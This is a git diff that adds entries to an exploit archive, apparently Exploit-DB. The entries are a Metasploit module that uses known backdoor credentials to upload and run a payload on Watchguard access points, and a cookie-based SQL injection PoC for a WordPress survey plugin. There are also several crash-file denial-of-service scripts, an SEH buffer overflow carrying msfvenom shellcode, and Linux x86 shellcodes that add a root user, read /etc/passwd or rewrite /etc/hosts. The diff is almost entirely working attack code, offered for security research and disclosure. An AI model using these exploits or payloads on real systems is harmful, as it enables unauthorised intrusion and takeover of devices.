diff --git a/exploits/linux/webapps/45409.rb b/exploits/linux/webapps/45409.rb
new file mode 100755
index 000000000..2a0846feb
--- /dev/null
+++ b/exploits/linux/webapps/45409.rb
@@ -0,0 +1,142 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Watchguard AP Backdoor Shell',
+      'Description' => 'Watchguard AP\'s have a backdoor account with known credentials. This can be used to
+                        gain a valid web session on the HTTP administration interface. The administrator
+						can then upload a shell directly to the web root to execute it.
+						This module can also be used if you have legitimate access credentials to the device.',
+      'References'  =>
+        [
+            ['CVE', 'CVE-2018-10575'],
+	    ['CVE', 'CVE-2018-10576'],
+	    ['CVE', 'CVE-2018-10577'],
+            ['URL', 'http://seclists.org/fulldisclosure/2018/May/12'],
+	    ['URL', 'https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy'],
+        ],
+      'Author'      => 'Stephen Shkardoon ', # ss23 / @ss2342
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'linux',
+      'Targets'        => [ [ 'Automatic', { } ] ],
+      'DefaultTarget'  => 0,
+      'Arch'           => ARCH_MIPSBE,
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        #Opt::SSL(true),
+        OptString.new('WG_USER', [ true, 'The username to authenticate as', 'admin']),
+        OptString.new('WG_PASS', [ true, 'The password for the specified username', '1234']),
+      ])
+  end
+
+  def exploit
+  begin
+    res = send_request_cgi({
+        'method'  => 'GET',
+        'uri'     => '/cgi-bin/luci/',
+        'headers' => {
+          'AUTH_USER' => datastore['WG_USER'],
+          'AUTH_PASS' => datastore['WG_PASS'],
+        },
+      })
+
+    if res.nil? || res.get_cookies.empty?
+	    fail_with(Failure::NotFound, 'Unable to obtain a valid session with provided credentials')
+	  end
+	  
+	  # We have a valid session, so we should pull out the access credentials and find the serial number
+	  sysauth = res.get_cookies.scan(/(sysauth=\w+);*/).flatten[0]
+    stok = res.redirection.to_s.scan(/;(stok=\w+)/).flatten[0]
+	
+	  vprint_status("Got sysauth #{sysauth}")
+    vprint_status("Got stok #{stok}")
+    
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => "/cgi-bin/luci/;#{stok}/html/Status",
+        'headers' => {
+          'AUTH_USER' => datastore['WG_USER'],
+          'AUTH_PASS' => datastore['WG_PASS'],
+        },
+        'cookie'    => sysauth,
+      })
+    
+    if res.nil? || res.code != 200
+      fail_with(Failure::NotFound, 'Unable to request serial')
+	  end
+    
+    # Pull out the serial and store it for later
+    # var	device_serial = "20AP0XXXXXXXX";
+    if res.body.match(/device_serial = "(\w+)";/)
+      serial = $1
+    else
+      fail_with(Failure::NotFound, 'Unable to find serial in response')
+    end
+    
+    vprint_status("Got serial #{serial}")
+
+    # Finally, upload our payloads
+    res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => "/cgi-bin/luci/;#{stok}/wgupload",
+        'headers' => {
+          'AUTH_USER' => datastore['WG_USER'],
+          'AUTH_PASS' => datastore['WG_PASS'],
+        },
+        'cookie'    => "#{sysauth}; serial=#{serial}; filename=/tmp/payload; md5sum=fail",
+        'data'      => payload.encoded_exe,
+      })
+
+    if res.nil? || res.code != 205
+      fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
+    end
+  
+    # Upload the lua script that executes our payload
+    res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => "/cgi-bin/luci/;#{stok}/wgupload",
+        'headers' => {
+          'AUTH_USER' => datastore['WG_USER'],
+          'AUTH_PASS' => datastore['WG_PASS'],
+        },
+        'cookie'    => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail",
+        'data'     => "#!/usr/bin/lua
+os.execute('/bin/chmod +x /tmp/payload');       
+os.execute('/tmp/payload');"
+      })
+    
+    if res.nil? || res.code != 205
+      fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}")
+    end
+    
+    # Remove the trigger script once we've got a shell
+    register_file_for_cleanup("/www/cgi-bin/payload.luci")
+    
+    vprint_status("Uploaded lua script")
+    
+    # Trigger our payload
+    res = send_request_cgi({
+        'method'    => 'GET',
+        'uri'       => "/cgi-bin/payload.luci",
+      })
+      
+    vprint_status("Requested lua payload")
+    
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      vprint_error("Failed to connect to the web server")
+      return nil
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/45411.txt b/exploits/php/webapps/45411.txt
new file mode 100644
index 000000000..3179b3d3c
--- /dev/null
+++ b/exploits/php/webapps/45411.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection
+# Date: 2018-09-09
+# Exploit Author: Ceylan Bozogullarindan
+# Vendor Homepage: http://modalsurvey.pantherius.com/
+# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip
+# Version: 1.5.7.3
+# Tested on: Windows 10
+# CVE: N\A
+
+# Description
+# The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. 
+
+# PoC
+# Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering.
+# Answer that question.
+# Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, 
+# and change it with the payload showed below;
+
+["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
+
+# It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result 
+# of the query. When you make it 1=1, you should see a question from firt record. 
+# Therefore OR statement must be returned False.
+
+# Step 3. Reload the page. Open the source code of the page. Search "sss_params". 
+# You will see the version of DB in value of sss_params parameter. 
+
+# The Request
+
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]	
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+# The result from source code of the page
+
+<script type='text/javascript'>
+/* <![CDATA[ */
+var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"};
+/* ]]> */
+</script>
+
+DB version: "10.1.36-MariaDB-1~trusty"....
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45410.py b/exploits/windows_x86-64/dos/45410.py
new file mode 100755
index 000000000..cbf71224d
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45410.py
@@ -0,0 +1,27 @@
+# Exploit Title: CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)
+# Discovery by: Alan Baeza
+# Discovery Date: 2018-09-13
+# Vendor Homepage: https://cdburnerxp.se/
+# Software Link: https://cdburnerxp.se/downloadsetup.exe
+# Tested Version: 4.5.8.6795
+# Tested on OS  : Windows 10 Pro x64 es
+
+#!/usr/bin/env python
+#-*-coding: utf-8-*-
+# Steps to Produce the DoS: 
+# 1.- Run python code : python dos.py
+# 2.- Open generate.txt and copy content to clipboard
+# 3.- Open CdBurnerXP
+# 4.- Select option "Copy or grab disc"
+# 5.- Select checkbox target "Hard disk"
+# 6.- Paste ClipBoard on "File name"
+# 7.- Clic Copy disc
+# 8.- DoS
+
+import socket, os, sys
+
+buffer = "\x41" * 260
+
+f = open ("generate.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows_x86-64/dos/45414.py b/exploits/windows_x86-64/dos/45414.py
new file mode 100755
index 000000000..b3ba63c9a
--- /dev/null
+++ b/exploits/windows_x86-64/dos/45414.py
@@ -0,0 +1,25 @@
+# Exploit Title: Faleemi Plus 1.0.2 - Denial of Service (PoC)  
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-14
+# Software Link: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe
+# Tested Version: 1.0.2
+# Tested on OS: Windows 10
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. Now click "Add Camera" and in the new 
+# window paste the content of "exploit.txt" into the following fields:
+# "Camera name" & "DID number". Click "Add" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 2000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/dos/45413.py b/exploits/windows_x86/dos/45413.py
new file mode 100755
index 000000000..1b60a28cf
--- /dev/null
+++ b/exploits/windows_x86/dos/45413.py
@@ -0,0 +1,26 @@
+# Exploit Title: InfraRecorder 0.53 - '.txt' Denial of Service (PoC)
+# Date: 2018-09-14
+# Exploit Author: Gionathan "John" Reale 
+# Version: version 0.53
+# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download
+# Tested on: Windows 7 32bit
+
+# Steps to Reproduce: 
+# Run the python exploit script, it will create a new file with the name "exploit.txt". 
+# Start the program and click "Edit" > "Import... "
+# Find the file "exploit.txt" and click "Open" 
+# You will see a crash!
+
+#!/usr/bin/python
+
+buffer = "A" * 6000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows_x86/local/45412.py b/exploits/windows_x86/local/45412.py
new file mode 100755
index 000000000..a4b13c538
--- /dev/null
+++ b/exploits/windows_x86/local/45412.py
@@ -0,0 +1,51 @@
+# Exploit Title: Free MP3 CD Ripper 2.6 - '.wma' Buffer Overflow (SEH)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-13
+# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
+# Tested on OS: Windows 7 32bit
+# Tested Version: 2.6
+# Steps to Reproduce: 
+# Run the python exploit script, it will create a new file with the name "exploit.wma". 
+# Start the program and click on "Convert". 
+# Find the file "exploit.wma" and click "Open" 
+# You will see a calculator poped up.
+  
+#!/usr/bin/python  
+    
+buffer = "A" * 4116
+ 
+NSEH = "\xeb\x06\x90\x90"
+ 
+SEH = "\x21\x21\xe4\x66"
+nops = "\x90" * 8
+#badchar \x00\x0a\x0d\x2f
+#msfvenom calculator
+buf =  ""
+buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29"
+buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a"
+buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b"
+buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c"
+buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a"
+buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9"
+buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21"
+buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08"
+buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85"
+buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75"
+buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64"
+buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5"
+buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16"
+buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e"
+buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92"
+buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88"
+buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b"
+pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) )
+ 
+payload = buffer + NSEH + SEH + nops + buf + pad
+try:
+    f=open("exploit.wma","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 55f959f94..c2e936a22 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6109,6 +6109,9 @@ id,file,description,date,author,type,platform,port
 45398,exploits/windows/dos/45398.py,"MediaTek Wirless Utility rt2870 - Denial of Service (PoC)",2018-09-13,"Lawrence Amer",dos,windows,
 45404,exploits/windows_x86-64/dos/45404.py,"TeamViewer App 13.0.100.0 - Denial of Service (PoC)",2018-09-13,"Ali Alipour",dos,windows_x86-64,
 45405,exploits/linux/dos/45405.txt,"Linux 4.18 - Arbitrary Kernel Read into dmesg via Missing Address Check in segfault Handler",2018-09-13,"Google Security Research",dos,linux,
+45410,exploits/windows_x86-64/dos/45410.py,"CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)",2018-09-14,"Alan Joaquín Baeza Meza",dos,windows_x86-64,
+45413,exploits/windows_x86/dos/45413.py,"InfraRecorder 0.53 - '.txt' Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86,
+45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9969,6 +9972,7 @@ id,file,description,date,author,type,platform,port
 45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86,
 45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows,
 45407,exploits/linux/local/45407.txt,"Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket",2018-09-13,"Google Security Research",local,linux,
+45412,exploits/windows_x86/local/45412.py,"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)",2018-09-14,"Gionathan Reale",local,windows_x86,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39975,3 +39979,5 @@ id,file,description,date,author,type,platform,port
 45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware,
 45396,exploits/windows/webapps/45396.txt,"Apache Portals Pluto 3.0.0 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
 45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows,
+45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443
+45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index c3b877e02..dd333117d 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -908,3 +908,7 @@ id,file,description,date,author,type,platform
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
+45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
+45418,shellcodes/linux_x86/45418.c,"Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/45415.c b/shellcodes/linux_x86/45415.c
new file mode 100644
index 000000000..8938d2741
--- /dev/null
+++ b/shellcodes/linux_x86/45415.c
@@ -0,0 +1,80 @@
+/* 
+# Shellcode Title: Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)
+# Date: 2018-09-13
+# Author: Ray Doyle (@doylersec)
+# Homepage: https://www.doyler.net
+# Tested on: Linux/x86
+# gcc -o poly_adduser_shellcode -z execstack -fno-stack-protector poly_adduser_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	90                   	nop
+ 8048061:	58                   	pop    eax
+ 8048062:	29 db                	sub    ebx,ebx
+ 8048064:	31 c9                	xor    ecx,ecx
+ 8048066:	66 b9 01 04          	mov    cx,0x401
+ 804806a:	51                   	push   ecx
+ 804806b:	5f                   	pop    edi
+ 804806c:	53                   	push   ebx
+ 804806d:	6a 06                	push   0x6
+ 804806f:	58                   	pop    eax
+ 8048070:	48                   	dec    eax
+ 8048071:	68 2f 2f 70 61       	push   0x61702f2f
+ 8048076:	68 37 13 37 13       	push   0x13371337
+ 804807b:	68 73 73 77 64       	push   0x64777373
+ 8048080:	68 2f 65 74 63       	push   0x6374652f
+ 8048085:	5a                   	pop    edx
+ 8048086:	5e                   	pop    esi
+ 8048087:	5f                   	pop    edi
+ 8048088:	5f                   	pop    edi
+ 8048089:	56                   	push   esi
+ 804808a:	57                   	push   edi
+ 804808b:	52                   	push   edx
+ 804808c:	89 e3                	mov    ebx,esp
+ 804808e:	cd 80                	int    0x80
+ 8048090:	50                   	push   eax
+ 8048091:	5a                   	pop    edx
+ 8048092:	92                   	xchg   edx,eax
+ 8048093:	89 c3                	mov    ebx,eax
+ 8048095:	6a 05                	push   0x5
+ 8048097:	31 d2                	xor    edx,edx
+ 8048099:	87 db                	xchg   ebx,ebx
+ 804809b:	6a 0c                	push   0xc
+ 804809d:	58                   	pop    eax
+ 804809e:	5a                   	pop    edx
+ 804809f:	92                   	xchg   edx,eax
+ 80480a0:	52                   	push   edx
+ 80480a1:	90                   	nop
+ 80480a2:	68 30 3a 3a 3a       	push   0x3a3a3a30
+ 80480a7:	56                   	push   esi
+ 80480a8:	5e                   	pop    esi
+ 80480a9:	68 3a 3a 30 3a       	push   0x3a303a3a
+ 80480ae:	68 72 30 30 74       	push   0x74303072
+ 80480b3:	48                   	dec    eax
+ 80480b4:	89 e1                	mov    ecx,esp
+ 80480b6:	6a 01                	push   0x1
+ 80480b8:	cd 80                	int    0x80
+ 80480ba:	6a 04                	push   0x4
+ 80480bc:	58                   	pop    eax
+ 80480bd:	83 c0 02             	add    eax,0x2
+ 80480c0:	cd 80                	int    0x80
+ 80480c2:	31 c0                	xor    eax,eax
+ 80480c4:	40                   	inc    eax
+ 80480c5:	cd 80                	int    0x80
+****************************************************/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x90\x58\x29\xdb\x31\xc9\x66\xb9\x01\x04\x51\x5f\x53\x6a\x06\x58\x48\x68\x2f\x2f\x70\x61\x68\x37\x13\x37\x13\x68\x73\x73\x77\x64\x68\x2f\x65\x74\x63\x5a\x5e\x5f\x5f\x56\x57\x52\x89\xe3\xcd\x80\x50\x5a\x92\x89\xc3\x6a\x05\x31\xd2\x87\xdb\x6a\x0c\x58\x5a\x92\x52\x90\x68\x30\x3a\x3a\x3a\x56\x5e\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x48\x89\xe1\x6a\x01\xcd\x80\x6a\x04\x58\x83\xc0\x02\xcd\x80\x31\xc0\x40\xcd\x80";
+
+main()
+{
+    printf("Shellcode Length: %d\n", strlen(code));
+    int (*ret)() = (int(*)())code;
+    ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45416.c b/shellcodes/linux_x86/45416.c
new file mode 100644
index 000000000..0047d6fa6
--- /dev/null
+++ b/shellcodes/linux_x86/45416.c
@@ -0,0 +1,64 @@
+/* 
+# Shellcode Title: Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode  (61 bytes)
+# Date: 2018-09-13
+# Author: Ray Doyle (@doylersec)
+# Homepage: https://www.doyler.net
+# Tested on: Linux/x86
+# gcc -o readfile_shellcode -z execstack -fno-stack-protector readfile_shellcode.c 
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	eb 2b                	jmp    804808d <call_shellcode>
+
+08048062 <shellcode>:
+ 8048062:	31 c0                	xor    eax,eax
+ 8048064:	b0 05                	mov    al,0x5
+ 8048066:	5b                   	pop    ebx
+ 8048067:	31 c9                	xor    ecx,ecx
+ 8048069:	cd 80                	int    0x80
+ 804806b:	89 c3                	mov    ebx,eax
+ 804806d:	b0 03                	mov    al,0x3
+ 804806f:	89 e7                	mov    edi,esp
+ 8048071:	89 f9                	mov    ecx,edi
+ 8048073:	31 d2                	xor    edx,edx
+ 8048075:	b6 10                	mov    dh,0x10
+ 8048077:	cd 80                	int    0x80
+ 8048079:	89 c2                	mov    edx,eax
+ 804807b:	31 c0                	xor    eax,eax
+ 804807d:	b0 04                	mov    al,0x4
+ 804807f:	31 db                	xor    ebx,ebx
+ 8048081:	b3 01                	mov    bl,0x1
+ 8048083:	cd 80                	int    0x80
+ 8048085:	31 c0                	xor    eax,eax
+ 8048087:	b0 01                	mov    al,0x1
+ 8048089:	31 db                	xor    ebx,ebx
+ 804808b:	cd 80                	int    0x80
+
+0804808d <call_shellcode>:
+ 804808d:	e8 d0 ff ff ff       	call   8048062 <shellcode>
+
+08048092 <message>:
+ 8048092:	2f                   	das    
+ 8048093:	65                   	gs
+ 8048094:	74 63                	je     80480f9 <message+0x67>
+ 8048096:	2f                   	das    
+ 8048097:	70 61                	jo     80480fa <message+0x68>
+ 8048099:	73 73                	jae    804810e <message+0x7c>
+ 804809b:	77 64                	ja     8048101 <message+0x6f>
+****************************************************/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x2b\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\x10\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd0\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
+
+main()
+{
+    printf("Shellcode Length: %d\n", strlen(code));
+    int (*ret)() = (int(*)())code;
+    ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45417.c b/shellcodes/linux_x86/45417.c
new file mode 100644
index 000000000..283b842fd
--- /dev/null
+++ b/shellcodes/linux_x86/45417.c
@@ -0,0 +1,66 @@
+/* 
+    # Title: Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)
+    # Date: 2018-09-13
+    # Author: Ray Doyle (@doylersec)
+    # Tested on: Linux/x86
+    # gcc -o poly_hosts_shellcode -z execstack -fno-stack-protector poly_hosts_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	29 c9                	sub    ecx,ecx
+ 8048062:	51                   	push   ecx
+
+08048063 <open>:
+ 8048063:	6a 05                	push   0x5
+ 8048065:	58                   	pop    eax
+ 8048066:	68 6f 73 74 73       	push   0x7374736f
+ 804806b:	68 74 63 2f 68       	push   0x682f6374
+ 8048070:	68 2f 2f 2f 65       	push   0x652f2f2f
+ 8048075:	54                   	push   esp
+ 8048076:	5b                   	pop    ebx
+ 8048077:	51                   	push   ecx
+ 8048078:	41                   	inc    ecx
+ 8048079:	b5 04                	mov    ch,0x4
+ 804807b:	cd 80                	int    0x80
+ 804807d:	93                   	xchg   ebx,eax
+ 804807e:	6a 04                	push   0x4
+ 8048080:	58                   	pop    eax
+
+08048081 <write>:
+ 8048081:	68 2e 63 6f 6d       	push   0x6d6f632e
+ 8048086:	68 6f 67 6c 65       	push   0x656c676f
+ 804808b:	68 31 20 67 6f       	push   0x6f672031
+ 8048090:	68 31 2e 31 2e       	push   0x2e312e31
+ 8048095:	68 31 32 37 2e       	push   0x2e373231
+ 804809a:	54                   	push   esp
+ 804809b:	59                   	pop    ecx
+ 804809c:	6a 14                	push   0x14
+ 804809e:	5a                   	pop    edx
+ 804809f:	cd 80                	int    0x80
+
+080480a1 <close>:
+ 80480a1:	92                   	xchg   edx,eax
+ 80480a2:	b0 06                	mov    al,0x6
+ 80480a4:	cd 80                	int    0x80
+
+080480a6 <exit>:
+ 80480a6:	31 c0                	xor    eax,eax
+ 80480a8:	40                   	inc    eax
+ 80480a9:	cd 80                	int    0x80
+****************************************************/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x29\xc9\x51\x6a\x05\x58\x68\x6f\x73\x74\x73\x68\x74\x63\x2f\x68\x68\x2f\x2f\x2f\x65\x54\x5b\x51\x41\xb5\x04\xcd\x80\x93\x6a\x04\x58\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x31\x20\x67\x6f\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x54\x59\x6a\x14\x5a\xcd\x80\x92\xb0\x06\xcd\x80\x31\xc0\x40\xcd\x80";
+
+main()
+{
+    printf("Shellcode Length: %d\n", strlen(code));
+    int (*ret)() = (int(*)())code;
+    ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45418.c b/shellcodes/linux_x86/45418.c
new file mode 100644
index 000000000..694d60a49
--- /dev/null
+++ b/shellcodes/linux_x86/45418.c
@@ -0,0 +1,127 @@
+/* 
+# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
+# Date: 2018-09-13
+# Author: Ray Doyle (@doylersec)
+# Homepage: https://www.doyler.net
+# Tested on: Linux/x86
+# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c 
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060:	eb 2f                	jmp    8048091 <find_address>
+
+08048062 <decoder>:
+ 8048062:	5f                   	pop    edi
+ 8048063:	57                   	push   edi
+ 8048064:	5e                   	pop    esi
+
+08048065 <get_key>:
